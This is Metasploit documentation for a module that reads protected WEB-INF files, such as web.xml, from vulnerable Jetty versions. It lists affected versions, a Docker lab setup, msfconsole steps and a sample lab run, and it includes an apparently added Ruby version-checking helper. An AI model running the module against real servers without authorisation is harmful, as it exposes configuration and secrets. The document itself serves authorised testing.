rapid7/metasploit-framework

documentation/modules/auxiliary/gather/jetty_web_inf_disclosure.md

## Vulnerable Application

Jetty suffers from a vulnerability in which certain encoded URIs and ambiguous paths can be used to
access protected files in the `WEB-INF` folder.

Versions affected are:

 - 9.4.37.v20210219, 9.4.38.v20210224
 - 9.4.37-9.4.42
 - 10.0.1-10.0.5
 - 11.0.1-11.0.5

Exploitation can retrieve any file in the `WEB-INF` folder, but `web.xml` is the most likely
to contain information of value.
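The version list above is what the module's automatic check reasons about before sending a request. The following is an added example (not the module's own code, and not from this doc) that classifies a Jetty version string against those ranges; the grouping of the ranges into the two CVEs follows the upstream Jetty advisories, and the `Server: Jetty(<version>)` header format assumed by the helper is the default Jetty banner.

```ruby
# Added example: map a Jetty version string to the CVEs whose affected
# ranges (as listed in this doc) contain it.

# Extract the numeric dotted prefix of a version and return it as integers.
# "9.4.37.v20210219" -> [9, 4, 37]; the ".vYYYYMMDD" build stamp and any
# "-SNAPSHOT" suffix are dropped because they are not version components.
def jetty_version_parts(version)
  numeric = version[/\A\d+(?:\.\d+)*/]
  return nil if numeric.nil?

  numeric.split('.').map { |p| Integer(p, 10) }
end

# Pull "11.0.5" out of a Server header value such as "Jetty(11.0.5)".
# Assumption: the banner follows Jetty's default "Jetty(<version>)" form.
def jetty_version_from_server_header(header_value)
  header_value[/Jetty\(([^)]+)\)/, 1]
end

# CVE-2021-28164 is tied to two specific builds; CVE-2021-34429 spans
# inclusive release ranges. Builds are compared on their numeric prefix.
AFFECTED = {
  'CVE-2021-28164' => { exact: %w[9.4.37.v20210219 9.4.38.v20210224] },
  'CVE-2021-34429' => { ranges: [%w[9.4.37 9.4.42], %w[10.0.1 10.0.5], %w[11.0.1 11.0.5]] }
}.freeze

# Inclusive range test on integer arrays; Array#<=> compares element-wise,
# so a shorter prefix such as [10, 0] sorts before [10, 0, 1].
def within?(parts, low, high)
  (jetty_version_parts(low) <=> parts) <= 0 && (parts <=> jetty_version_parts(high)) <= 0
end

# Return the CVE identifiers that apply to +version+ (empty if none, or if
# the string carries no parsable numeric version).
def vulnerable_cves(version)
  parts = jetty_version_parts(version)
  return [] if parts.nil?

  AFFECTED.select do |_cve, spec|
    if spec[:exact]
      spec[:exact].any? { |build| jetty_version_parts(build) == parts }
    else
      spec[:ranges].any? { |low, high| within?(parts, low, high) }
    end
  end.keys
end
```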

### CVE-2021-34429

Use the Docker image from [ColdFusionX](https://github.com/ColdFusionX/CVE-2021-34429) at
https://github.com/ColdFusionX/CVE-2021-34429/blob/main/docker-compose.yml

## Verification Steps

1. Install Jetty with an app that contains a `WEB-INF` folder
1. Start msfconsole
1. Do: `use auxiliary/gather/jetty_web_inf_disclosure`
1. Do: `set rhosts`
1. Do: `run`
1. You should get the contents of a file

## Options

### FILE

The file in the `WEB-INF` folder to retrieve. Defaults to `web.xml`.

### CVE

Which vulnerability to use. Options: `CVE-2021-34429`, `CVE-2021-28164`. Defaults to `CVE-2021-34429`.

## Scenarios

### Jetty 11.0.5 from Docker

```
resource (jetty.rb)> use auxiliary/gather/jetty_web_inf_disclosure
resource (jetty.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (jetty.rb)> set rport 8080
rport => 8080
resource (jetty.rb)> set verbose true
verbose => true
resource (jetty.rb)> run
[*] Running module against 1.1.1.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found version: 11.0.5
[+] 11.0.5 vulnerable to CVE-2021-34429
[!] The service is running, but could not be validated.
[+] File stored to /home/h00die/.msf4/loot/20211108134054_default_1.1.1.1_jetty.web.xml_813220.xml
[+] <!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>
```